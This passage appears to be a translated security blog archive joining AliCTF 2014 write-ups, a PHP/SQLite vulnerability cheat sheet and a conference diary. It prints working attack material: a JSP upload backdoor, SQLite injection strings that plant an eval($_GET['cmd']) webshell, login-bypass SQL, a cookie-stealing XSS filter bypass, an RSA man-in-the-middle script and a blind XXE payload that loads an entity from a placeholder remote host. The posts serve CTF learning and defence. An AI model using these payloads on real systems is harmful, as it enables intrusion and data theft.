lost comparatively few points.</span> </p> <p class="md_block"> <span class="md_line">Also, with the wired network connected to the GameBox environment and wireless connected to Wi-Fi, the wired link takes precedence, so routes must be added. On a Mac:</span> </p> <pre><code>sudo route flush
sudo route delete 0.0.0.0
sudo route add -net 0.0.0.0 172.16.1.254       # wireless gateway
sudo route add -net 10.1.100.0/24 10.1.7.254   # wired GameBox segment</code></pre> <!--block_code_end--> <h4 id="toc_2">0x02 Java NPC</h4> <p class="md_block"> <span class="md_line">I do not know Java well myself, but on day one I looked at the first Java NPC challenge and, after some detours, somehow took First Blood.</span> </p> <p class="md_block"> <span class="md_line">Java NPC starts with an upload bypass: uploads may not exceed 106 bytes, and certain extensions are blocked. Uploading with an upper-case JSP extension got through and the JSP executed; the framework was Jetty. Later kxlzx mentioned that the intended solution was to download Jetty and analyse the other mapped extensions rather than switch case</span> </p> <pre><code> &lt;servlet-mapping&gt; 
   &lt;servlet-name&gt;jsp&lt;/servlet-name&gt;
   &lt;url-pattern&gt;*.jsp&lt;/url-pattern&gt;
   &lt;url-pattern&gt;*.jspf&lt;/url-pattern&gt;
   &lt;url-pattern&gt;*.jspx&lt;/url-pattern&gt;
   &lt;url-pattern&gt;*.xsp&lt;/url-pattern&gt;
   &lt;url-pattern&gt;*.JSP&lt;/url-pattern&gt;
   &lt;url-pattern&gt;*.JSPF&lt;/url-pattern&gt;
   &lt;url-pattern&gt;*.JSPX&lt;/url-pattern&gt;
   &lt;url-pattern&gt;*.XSP&lt;/url-pattern&gt;
 &lt;/servlet-mapping&gt;</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">Once uploads worked, the UP directory turned out to allow directory listing, so an index.html was uploaded first. Fitting a JSP script into 105 bytes caused some head-scratching; it was solved like this:</span> </p> <p class="md_block"> <span class="md_line">First upload a script to obtain the current path</span> </p> <pre><code>/tmp/webapp</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">Then adjust a backdoor like this</span> </p> <pre><code>&lt;%(new java.io.FileOutputStream("/tmp/webapp/up/xx.JSP")).write(request.getParameter("t").getBytes());%&gt;</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">Write an HTML form on the client</span> </p> <pre><code>&lt;form action="http://xxxx/up/xxxx.JSP" method="post"&gt;
&lt;textarea name=t cols=120 rows=10 width=45&gt;your code&lt;/textarea&gt;&lt;BR&gt;&lt;center&gt;&lt;br&gt;
&lt;input type=submit value="提交"&gt;
&lt;/form&gt;</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">Upload other backdoors, then dig around until the flag is found. First blood taken.</span> </p> <p class="md_block"> <span class="md_line">The Java backdoor challenge was only half done and my own understanding is partial, so no more notes on it.</span> </p> <h4 id="toc_3">0x03 Summary</h4> <p class="md_block"> <span class="md_line">The AliCTF final challenges had real depth; thanks to the organisers, and even more to the teammates who played together.</span> </p> <p class="md_block"> <span class="md_line">Finally, on senior year and work, a keepsake:</span> </p> <pre><code>awk -F '=' '/\[F2\]/{a=1}a==1&amp;&amp;$1~/A1/{print a;}' conf.ini</code></pre> <!--block_code_end--> A Brief Analysis of Common Vulnerabilities under PHP/SQLite - PHP/Sqlite Vulnerability Cheat Sheet 2014-10-08T16:00:00Z post/php-sqlite-vulnerability-cheatsheet Sword Soul <h3 id="toc_0">0x00 Preface</h3> <p class="md_block"> <span 
class="md_line">PHP developers will be familiar with SQLite as a lightweight database; since PHP 5 this compact embedded database has been bundled by default. CMSs built on PHP/SQLite are exposed to some common security threats. The author analyses a few examples below; corrections and additions are welcome.</span> </p> <h3 id="toc_1">0x01 Database Download</h3> <p class="md_block"> <span class="md_line">As a single-file lightweight database it has the same problem as Access: the database file can be downloaded. Several of the CMSs tested used a fixed or default database name and path, so the file could be downloaded, a security threat.</span> </p> <p class="md_block"> <span class="md_line">Some CMSs randomise the database file name yet remain at risk, XiaoCMS for example</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/sqlite-01.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">The #% that appears to prevent downloads is bypassed simply by URL-encoding it, and because of the short-file-name vulnerability the random name is no longer safe either: guessing a 4-character combination of 0-9a-f is enough to download the data:</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/sqlite-02.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">Borrowing the protection used for Access databases, some CMSs change the database extension to php and create a table with &quot;create table &#39;&lt;?php&#39; (a); &quot; hoping to block downloads, but this introduces a new threat.</span> </p> <h3 id="toc_2">0x02 GetShell via the Database</h3> <p class="md_block"> <span class="md_line">First Akcms: its SQLite build uses a php extension for the database but does not even add the &#39;&lt;?php&#39; table, so obtaining (guessing) the six-character database file name is enough to get a shell. Below is an example of inserting phpinfo();</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/sqlite-03.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">稻草人CMS does add the &#39;&lt;?php&#39; table, but PHP throws no error, so the database contents can still be downloaded.</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/sqlite-04.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">稻草人CMS filters front-end input with strip_tags(), which prevents a direct GetShell, but downloading the database and cracking the admin password gives access to a back end that can edit arbitrary files, with the threat that implies.</span> </p> <h3 id="toc_3">0x03 Injection Syntax</h3> <p class="md_block"> <span class="md_line">For convenient testing, the following PHP script was written</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/sqlite-05.png" alt="img" title="" ></span> </p> <p class="md_block"> <span 
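class="md_line">Before the screenshots, an added Python example (editor's code, not the author's PHP test script) that rebuilds the same unfiltered <code>where id=$id</code> query against a constructed user table, runs the union and sqlite_master payloads this section walks through, and reproduces the 0x04 observation that a single-statement API refuses the ATTACH payload while an exec-style API creates a file (here under a temporary directory rather than C:\wamp\www). The parameterised lookup beside it is the fix.</span> </p>

```python
import os
import sqlite3
import tempfile

# Constructed sample rows shaped like the page's user table (id, user, pass).
SAMPLE_ROWS = [(1, "admin", "s3cr3t"), (2, "alice", "wonder"), (3, "bob", "builder")]

# The two union payloads walked through in this section, verbatim.
UNION_PASS = "4 union select user,pass,id from user where id=1"
UNION_SCHEMA = "4 union select 1,sql,3 from sqlite_master"


def make_db(path=":memory:"):
    """Create a database with the same three-column user table as sqlite.db."""
    conn = sqlite3.connect(path)
    conn.execute("CREATE TABLE user(id integer, user text, pass text)")
    conn.executemany("INSERT INTO user VALUES (?, ?, ?)", SAMPLE_ROWS)
    conn.commit()
    return conn


def vulnerable_lookup(conn, user_id):
    """The page's flaw: id is pasted into the statement, so it can carry SQL.
    UNION_PASS returns the pass column, UNION_SCHEMA the CREATE TABLE text."""
    sql = "select * from user where id=%s" % user_id
    return conn.execute(sql).fetchall()


def safe_lookup(conn, user_id):
    """The fix: a bound parameter is compared as a value, never parsed as SQL,
    so the same payload simply matches no row."""
    return conn.execute("select * from user where id=?", (user_id,)).fetchall()


def single_statement_only(conn, sql):
    """execute() rejects a string holding more than one statement, which is the
    behaviour the page attributes to $db->query(): the ';ATTACH ...' payload
    never runs. Returns True if the string was accepted, False if refused."""
    try:
        conn.execute(sql)
        return True
    except (sqlite3.Warning, sqlite3.ProgrammingError):
        # "You can only execute one statement at a time." (class varies by version)
        return False


def attach_injection(workdir):
    """executescript() runs every statement, like the page's $db->exec(), so one
    injected ';' lets ATTACH DATABASE create a brand-new file at any path the
    process can write. Returns the created path, or None if nothing appeared."""
    target = os.path.join(workdir, "pwn.db")  # stands in for C:\wamp\www\le4f.php
    conn = make_db(os.path.join(workdir, "sqlite3.db"))
    payload = ("4;ATTACH DATABASE '%s' AS pwn;"
               "CREATE TABLE pwn.exp(dataz text);"
               "INSERT INTO pwn.exp(dataz) VALUES('marker')" % target)
    conn.executescript("select * from user where id=%s" % payload)
    conn.close()
    return target if os.path.exists(target) else None


def run_attach_demo():
    """Run attach_injection in a throwaway directory; True if the file appeared."""
    workdir = tempfile.mkdtemp(prefix="sqlite-inj-")
    return attach_injection(workdir) is not None


if __name__ == "__main__":
    db = make_db()
    print("union pass   :", vulnerable_lookup(db, UNION_PASS))
    print("union schema :", vulnerable_lookup(db, UNION_SCHEMA))
    print("parameterised:", safe_lookup(db, UNION_PASS))
    print("query()-style:", single_statement_only(db, "select 1; select 2"))
    print("exec()-style :", run_attach_demo())
```

<p class="md_block"> <span 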
class="md_line">The connected database file sqlite.db has these contents:</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/sqlite-06.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">As you can see, the id input is not filtered at all and can be exploited; a demo follows:</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/sqlite-07.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">Normal id inputs 1-3 each return the matching name, whereas the injected statement:</span> </p> <p class="md_block"> <span class="md_line">4 union select user,pass,id from user where id=1;</span> </p> <p class="md_block"> <span class="md_line">uses union to retrieve the pass value of id 1.</span> </p> <p class="md_block"> <span class="md_line">Much like MySQL 5.x, SQLite has a table resembling information_schema that is hidden by default, called sqlite_master; its columns are type, name, tbl_name, rootpage and sql, the sql column being the valuable one.</span> </p> <p class="md_block"> <span class="md_line">First confirm that column 2 is the one echoed back</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/sqlite-08.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">Query the sql column</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/sqlite-09.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">This yields the table structure, as above</span> </p> <p class="md_block"> <span class="md_line">Other common syntax is also similar to MySQL, e.g.:</span> </p> <pre><code>Comment:       --
Concatenation: ||
Substring:     substr(a,b,c)
Length:        length(x)</code></pre> <!--block_code_end--> <h3 id="toc_4">0x04 GetShell via Injection</h3> <p class="md_block"> <span class="md_line">In SQLite the ATTACH statement attaches a database (creating the file if it does not exist), so it can be used to get a shell through SQLite injection. However, the query call used above:</span> </p> <pre><code>$db-&gt;query($sql);</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">cannot create a file via ATTACH</span> </p> <p class="md_block"> <span class="md_line">For the GetShell environment below, a SQLite3 database is created for testing</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img 
class="md_compiled " src="/img/sqlite-10.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">The script is modified as follows:</span> </p> <pre><code>&lt;?php
if (isset($_GET['id'])){
    $id=$_GET['id'];
} else {
    echo "id!";
    exit;
}
$db = new PDO('sqlite:sqlite3.db');
$sql="select * from user where id=$id";
echo "&lt;h4&gt;Sql: ".$sql."&lt;/h4&gt;";
var_dump(@$db-&gt;exec($sql));</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">Now an injected statement can plant a webshell</span> </p> <p class="md_block"> <span class="md_line">Test statement 1:</span> </p> <pre><code>4;ATTACH DATABASE 'C:\\wamp\\www\\le4f.php' AS pwn;CREATE TABLE pwn.exp(dataz text);INSERT INTO pwn.exp(dataz) VALUES('&lt;?php phpinfo();?&gt;');--</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/sqlite-11.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">phpinfo is obtained</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/sqlite-12.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">Write a webshell:</span> </p> <pre><code>4;ATTACH DATABASE 'C:\\wamp\\www\\shell.php' AS pwn;CREATE TABLE pwn.exp(dataz text);INSERT INTO pwn.exp(dataz) VALUES('&lt;? 
eval($_GET['cmd']); ?&gt;');--</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/sqlite-13.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/sqlite-14.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">PHP can call SQLite in several other ways; presumably both execute- and exec-style calls may allow a GetShell. For a SQLite2 database, the following code:</span> </p> <pre><code>$db = new PDO('sqlite2:sqlite.db');
$db-&gt;exec($sql);</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">lets an injected ATTACH create an empty file, but data could not be inserted. Readers who have looked into this, please share.</span> </p> <h3 id="toc_5">0x05 Summary</h3> <p class="md_block"> <span class="md_line">Like Access, SQLite is compact and convenient but also carries many exploitable threats that developers need to watch for. The above is only the tip of the iceberg as seen by the author; more is left for readers to discover.</span> </p> <p class="md_block"> <span class="md_line">First published at <a class="md_compiled" href="http://www.91ri.org/10983.html">Network Attack and Defence Lab</a>; do not repost without permission.</span> </p> Notes from the ISC2014 Internet Security Conference - ISC2014 Participant 2014-09-30T16:00:00Z essay/isc2014-participant Sword Soul <p class="md_block"> <span class="md_line">First, happy birthday to the motherland</span> </p> <p class="md_block"> <span class="md_line">Not long after finishing AliCTF last week, I happened to be invited to the ISC attack-and-defence challenge (read: exhibition) match, so I took my teammates along to ISC to watch.</span> </p> <p class="md_block"> <span class="md_line">ISC's full name should be &quot;the most authoritative annual summit in Asia-Pacific information security: the 2014 China Internet Security Conference (ISC 2014)&quot;. The conference was large and the venue quite lavish; 数字 clearly put a lot of effort into it.</span> </p> <p class="md_block"> <span class="md_line">I wandered around for two days and will not record much of the content. Mostly I looked around, found friends to chat with and ate; the only talk I heard in full was probably that of Tom Ridge, the first US Secretary of Homeland Security, and with no interpreter I could not help dozing.</span> </p> <p class="md_block"> <span class="md_line">The exhibition match on the afternoon of the 24th was quite fun; we were lucky enough to place and are waiting for the prize money. After that came the booth activities, where I met J and watched him crack a vending machine.. how about a free drink? Over the next two days I went through every shop under the metro station beside the National Convention Center; the eating options nearby were dire, enough to despair. All in all a pleasant few days with lasting memories; oh, and getting a taxi in the capital is a bit heartbreaking ;-)</span> </p> <p class="md_block"> <span class="md_line">There is still a long way to go: learn widely, act steadfastly, and keep your tools close.</span> </p> [CTF]AliCTF-Quals-2014-L-WriteUp 2014-09-24T16:00:00Z writeup/-ctf-alictf-quals-2014-l-writeup Sword Soul <p class="md_block"> <span class="md_line">::L Team:: <a class="md_compiled" 
href="http://l-team.org/">http://l-team.org</a></span> </p> <hr> <h4 id="toc_0">0x00 Trend</h4> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-trend.png" alt="img" title="" ></span> </p> <h4 id="toc_1">0x01 BigData</h4> <h5 id="toc_2">BigData-100</h5> <blockquote> <p class="md_block"> <span class="md_line">An employee compromised a server through an intranet web service and planted a webshell.<br /></span> <span class="md_line"> Using that server's web access log, identify the line numbers of the webshell events and add them up.<br /></span> <span class="md_line"> For example, if the suspicious event lines are 1, 3 and 19, the flag is 23.<br /></span> <span class="md_line"> Challenge download: click to download</span> </p> </blockquote> <p class="md_block"> <span class="md_line">First we looked at the distinct UAs and URLs and counted requests, finding an odd access4.jsp; submitting that was wrong, as the site normally served aspx. Grepping for php turned up php records; after removing bots, the shell under plus showed up: config1.php</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-big-100-01.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">To compute the sum, a simple script was written</span> </p> <pre><code>a=0
while read var
do
a=`expr $a + $var`
done
echo $a</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-big-100-02.png" alt="img" title="" ></span> </p> <hr> <h5 id="toc_3">BigData-200</h5> <blockquote> <p class="md_block"> <span class="md_line">Alice and Bob communicate through a proxy server using some protocol; the hacker Mallory has compromised the server and can intercept every message Alice and Bob send.<br /></span> <span class="md_line"> After intercepting a message from one party, Mallory can forward it unchanged to the other party or send the other party a forged message.<br /></span> <span class="md_line">Rumour has it that Alice will soon wire money to Bob, but Alice does not know Bob's bank account, so she decides to ask Bob through the proxy. Mallory has an evil idea: he wants Alice to wire all the money to his own account, mallory@mallory.com.<br /></span> <span class="md_line">wiki link Mallory is trying to raise money to attend AliCTF; can you help him?<br /></span> <span class="md_line"> connect data200.alictf.com 30000<br /></span> <span class="md_line"> hint: wiki link </span> </p> </blockquote> <p class="md_block"> <span class="md_line">Connecting to the server, we observe the two parties' traffic (forwarded directly each time by pressing 2 or 1):</span> </p> <pre><code>Alice said: 
Hey,Bob!
Bob said: Yes
Alice said: Let's encrypt with rsa,my public key is (11316499 , 65537)
Bob said: OK,my public key is (9204067 , 65537)</code></pre> <!--block_code_end--> <p class="md_block md_has_block_below md_has_block_below_blockquote"> <span class="md_line">What follows is the encrypted traffic; after forwarding it twice more, the session prints gameover and exits.<br /></span> <span class="md_line">From the observed traffic we learn:</span> </p> <blockquote> <p class="md_block"> <span class="md_line">1. Both sides encrypt the conversation with RSA.</span> </p> <p class="md_block"> <span class="md_line">2. The RSA modulus N in each public key is tiny, so it can be factored and the private key recovered.</span> </p> </blockquote> <p class="md_block"> <span class="md_line">Recovering both private keys reveals the subsequent messages:</span> </p> <pre><code>Alice said: What's your account?
Bob said: My account is bob@bob.com</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">As the challenge intends, I replaced Bob's address with mallory@mallory.com (note: it is case-sensitive), encrypted the message with Alice's public key and sent it on.</span> </p> <p class="md_block"> <span class="md_line">I expected to walk away with the key, but instead another message arrived from Alice; decrypting it with Bob's recovered private key gave:</span> </p> <pre><code>Alice said: Let's encrypt with rsa,my public key is (8965793 , 65537)</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">This looks like a new round of public-key exchange. Forwarding it with 2 resulted in an immediate gameover.</span> </p> <p class="md_block"> <span class="md_line">After some trial it turned out that only option 4 (modify and forward) works here, so I replayed the key-exchange messages from the first round. The sequence of operations:</span> </p> <pre><code>Alice said: Let's encrypt with rsa,my public key is ( 8965793 , 65537 )  (drop by mallory)
Mallory said: Let's encrypt with rsa,my public key is ( 12137569 , 65537 )
Bob said: OK,my public key is ( 11316499 , 65537 )  (drop by mallory)
Mallory said: OK,my public key is ( 11316499 , 65537 )</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">Then recover the new private keys from the newly exchanged public keys and decrypt the plaintext that follows:</span> </p> <pre><code>Alice said: What's your account?
Bob said: My account is bob@bob.com</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">So I swapped the address with the same trick, thinking this time I would get the key, and yet another key-exchange round appeared...</span> </p> <p class="md_block"> <span class="md_line">Summarizing what we know, the protocol flow is roughly this:</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-big-200-01.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">...</span> </p> <p class="md_block"> <span class="md_line">Presumably the flag is produced once the protocol finishes.</span> </p> <p class="md_block"> <span class="md_line">Each round of key exchange looks roughly like this (shown: the exchange between the second and third rounds):</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-big-200-02.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">So a MITM attack that breaks this protocol can be designed.</span> </p> <p class="md_block"> <span class="md_line">The general form of the attack at round N:</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-big-200-03.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">I wrote a script following this procedure and probed the number of key-exchange rounds N step by step; it turned out that N=50, after which the flag is delivered as a plaintext message.</span> </p> <p class="md_block"> <span class="md_line">The script:</span> </p> <pre><code>import socket
import math
from string import *

def exeuclid(a,b):
    # extended Euclid: returns x, y, gcd with a*x + b*y == gcd
    if b == 0:
        return 1 , 0 , a;
    else:
        x,y,q = exeuclid(b,a%b);
        x,y = y,(x-a/b*y);
        return x,y,q;

def getpq(x):
    # trial division: the moduli are small enough to factor directly
    for i in xrange(2, int(math.sqrt(x))+1):
        if x % i == 0:
            return i, x/i

def getprikey(e,n):
    p, q=getpq(n)
    d,x,y=exeuclid(e,(p-1)*(q-1))
    if d&lt;0:
        d=(p-1)*(q-1)+d
    return d, n

def decrypt(c,d,n):
    m=pow(c,d,n)
    return m

def encrypt(m,e,n):
    c=pow(m,e,n)
    return c

def reciveanddecrypt(key=()):
    # messages arrive as comma-separated integers, one per character
    s = sock.recv(1024)
    s = split(s,'\n')[2]
    s = s[5:len(s)-3]
    cl = s.split(',')
    s1=''
    for x in cl:
        if key == ():
            s1 = s1 + chr(int(x))
        else:
            s1 = s1 + chr(decrypt(int(x),key[0],key[1]))
    return s1

def encryptandsend(msg,n):
    s1='Start'
    for x in msg:
        s1 = 
s1+str(encrypt(ord(x),65537,n))+','
    s1=s1[:len(s1)-1]+'End'
    sock.send(s1)
    print 'Mallory said:', msg
    return 0

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(('data200.alictf.com', 30000))

#--init--
s = sock.recv(1024)
s = split(s,'\n')[8]
s = s[5:len(s)-3]
cl = s.split(',')
s1=''
for x in cl:
    s1 = s1 + chr(int(x))
print 'Alice said:', s1
sock.send('2')

s = sock.recv(1024)
s = split(s,'\n')[2]
s = s[5:len(s)-3]
cl = s.split(',')
s1=''
for x in cl:
    s1 = s1 + chr(int(x))
print 'Bob said:', s1
sock.send('1')

#first rsa key exchange
print 'No. ', 1,' RSA public key exchange'
s1 = reciveanddecrypt()
print 'Alice said:', s1
s1_bak = s1[:]    #preserve Alice's first rsa key message for later use
s1 = s1[41:len(s1)-2]
n1=int(split(s1,',')[0])
prikey1=getprikey(65537,n1)    #calculate Alice's private key
sock.send('2')    #send it to Bob

s2 = reciveanddecrypt()
print 'Bob said:', s2
s2_bak = s2[:]    #preserve Bob's first rsa key message for later use
s2 = s2[21:len(s2)-2]
n2=int(split(s2,',')[0])
prikey2=getprikey(65537,n2)    #calculate Bob's private key
sock.send('1')    #send it to Alice

s1 = reciveanddecrypt(prikey2)
print 'Alice said:', s1
sock.send('2')

s1 = reciveanddecrypt(prikey1)
print 'Bob said:', s1,' (drop by mallory)'
msg='My account is mallory@mallory.com'    #mallory@mallory.com
sock.send('3')
encryptandsend(msg,n1)

nn1 = n1
nn2 = n2
for i in xrange(49):    #second and another rsa key exchange
    print 'No. 
', i+2,' RSA public exchange'
    s1 = reciveanddecrypt(prikey2)
    print 'Alice said:', s1,' (drop by mallory)'
    sock.send('4')    #send Alice's old public key to Bob
    encryptandsend(s1_bak,nn2)    #use Bob's old public key to encrypt

    s2 = reciveanddecrypt(prikey1)
    print 'Bob said:', s2,' (drop by mallory)'
    sock.send('3')    #send Bob's old public key to Alice
    encryptandsend(s2_bak,nn1)    #use Alice's old public key to encrypt

    s1 = s1[41:len(s1)-2]
    nn1=int(split(s1,',')[0])
    nprikey1=getprikey(65537,nn1)    #calculate Alice's new private key
    s2 = s2[21:len(s2)-2]
    nn2=int(split(s2,',')[0])
    nprikey2=getprikey(65537,nn2)    #calculate Bob's new private key

    s1 = reciveanddecrypt(prikey2)    #use Alice's old private key to decrypt
    print 'Alice said:', s1,' (drop by mallory)'
    sock.send('4')
    encryptandsend(s1,nn2)    #use Bob's new public key to encrypt

    s1 = reciveanddecrypt(prikey1)    #use Bob's old private key to decrypt
    print 'Bob said:', s1,' (drop by mallory)'
    msg='My account is mallory@mallory.com'    #mallory@mallory.com
    sock.send('3')
    encryptandsend(msg,nn1)    #use Alice's new public key to encrypt

print sock.recv(1024)
sock.close()</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">PS: there is another approach: generate your own key pair and substitute your public key for both parties' keys during the first exchange, which saves having to recover their private keys in order to read the traffic. Unfortunately the challenge program forbids it: using 3 or 4 to replace traffic during the first key exchange ends the game immediately.</span> </p> <hr> <h4 id="toc_4">0x02 WEB-A</h4> <h5 id="toc_5">WebA-100</h5> <blockquote> <p class="md_block"> <span class="md_line">Let's start from the login.<br /></span> <span class="md_line">hint: where is the manual-injection master?<br /></span> <span class="md_line">http://web100a.alictf.com/fbdd6257b154b33dc977839c3cde7d79.php </span> </p> </blockquote> <p class="md_block"> <span class="md_line">The hint was a YouTube video; watching it, the bypass relies on</span> </p> <pre><code>' '-0||' ' AND pass=xxx</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">The chat group also said an ordinary universal password of no more than 10 characters works; trying this bypassed the login:</span> </p> <pre><code>' || 1=1 ||'</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line md_line_dom_embed"><img 
class="md_compiled " src="/img/alictf-weba-100-01.png" alt="img" title="" ></span> </p> <hr> <h5 id="toc_6">WebA-200</h5> <blockquote> <p class="md_block"> <span class="md_line">Casper wrote a script to defend against XSS through inline event handlers. Can you bypass it, send it to the administrator, and obtain the administrator's cookie? <br /></span> <span class="md_line"> http://web200a.alictf.com/9ad626cab2d2d7309626e1a1ec9c1c41.php </span> </p> </blockquote> <pre><code>function hookEvent(onevent) {
    document.addEventListener(onevent.substr(2), function(e) {
        var element = e.target;
        var flags = element['_flag'];
        if (!flags) {
            flags = element['_flag'] = {};
        }
        if (typeof flags[onevent] != 'undefined') {
            return;
        }
        flags[onevent] = true;
        if (element.nodeType != Node.ELEMENT_NODE) {
            return;
        }
        var code = element.getAttribute(onevent);
        if (code &amp;&amp; chkxss(code)) {
            console.log("xss");
            element[onevent] = null;
        }
    }, true);
}

function chkxss(code){
    try{
        decodecode = decodeURIComponent(code);
    }catch(e){
        decodecode = code;
    }
    var xsses = ["fromCharCode","join","concat","slice","substr","match","split","escape","encodeURI","replace","\\","eval","setTimeout","setInterval","getScript","constructor","erHTML","Attribute","unction","execScript","with","setImmediate","createElement","write","name","referer","cookie","location","click"];
    for(i=0;i&lt;xsses.length;i++){
        if(decodecode.indexOf(xsses[i])&gt;-1){
            return true;
        }
    }
    if(/(&amp;&amp;)|;|,|\[/.test(decodecode)&amp;&amp;decodecode.indexOf("+")&gt;-1){
        return true;
    }
    if((decodecode.indexOf("URL")&gt;-1||decodecode.indexOf("hash"))&gt;-1&amp;&amp;location.href.indexOf("#")&gt;-1){
        return true;
    }
    if(code.length&gt;150){
        return true;
    }
    if(decodecode.indexOf('open')&gt;-1||/\Wsrc\W/.test(decodecode)){
        return true;
    }
    return false;
}

for (var k in document) {
    if (/^on/.test(k)) {
        hookEvent(k);
    }
}</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">This is a client-side filter; a search turns up similar demos. It is blacklist-based, so it can be bypassed: the code never blocks decodeURIComponent, which opens the door to encoding tricks.<br /></span> <span class="md_line">Earlier in the code there is a try statement:</span> </p> <pre><code>try{
    decodecode = 
decodeURIComponent(code);
}catch(e){
    decodecode = code;
}</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">The incoming code is decoded once, so double URL-encoding it bypasses the check. Alternatively, include an undecodable sequence such as a bare %xx so that decodeURIComponent throws and the catch branch skips the URL decode altogether.</span> </p> <p class="md_block"> <span class="md_line">decodeURIComponent also works on eval itself: global functions are members of window by default, so</span> </p> <pre><code>window[decodeURIComponent('%65val')]()</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">gets past the filter.</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-weba-200-01.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">URL-encoding that once more and submitting it, the cookie arrived:</span> </p> <pre><code>web200aflag=ALICTF{b6daff2073c78dabe09f22ac33f53823}</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">A small aside: the flag received from the XSS was rejected on submission. Testing locally, I found that my own browser had inexplicably acquired a web200aflag cookie, which meant the challenge had been modified in the meantime; collecting again yielded the new flag.</span> </p> <hr> <h5 id="toc_7">WebA-300</h5> <blockquote> <p class="md_block"> <span class="md_line">You just can't see it <br /></span> <span class="md_line">http://web300a.alictf.com/48f70e5ec569b7dec86bf9e35212c7f2.php </span> </p> </blockquote> <p class="md_block"> <span class="md_line">It felt like XXE at first. I went back to my blog to brush up and tried a few payloads, but got no reaction at all. Stuck.</span> </p> <p class="md_block"> <span class="md_line">Then I searched for blind XXE, found a Black Hat 2013 report, and afterwards this blog post:</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><a class="md_compiled" href="http://hivesec.net/web-security/%E5%85%B3%E4%BA%8Eblind-xxe.html">http://hivesec.net/web-security/%E5%85%B3%E4%BA%8Eblind-xxe.html</a></span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-weba-300-01.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">I also found a worked case against xianguo.com on WooYun, and tested:</span> </p> <pre><code>&lt;?xml version="1.0" encoding="UTF-8"?&gt;
&lt;!DOCTYPE root [
&lt;!ENTITY % remote SYSTEM "http://xxx/xxe/flag.xml"&gt;
%remote;
]&gt;</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">The request showed up in my log. file:// could not read the file, so I read it through php://filter and had the result sent to a log.php I wrote:</span> </p> <pre><code>&lt;?php
$log=$_GET['c'];
file_put_contents('233.txt',$log);
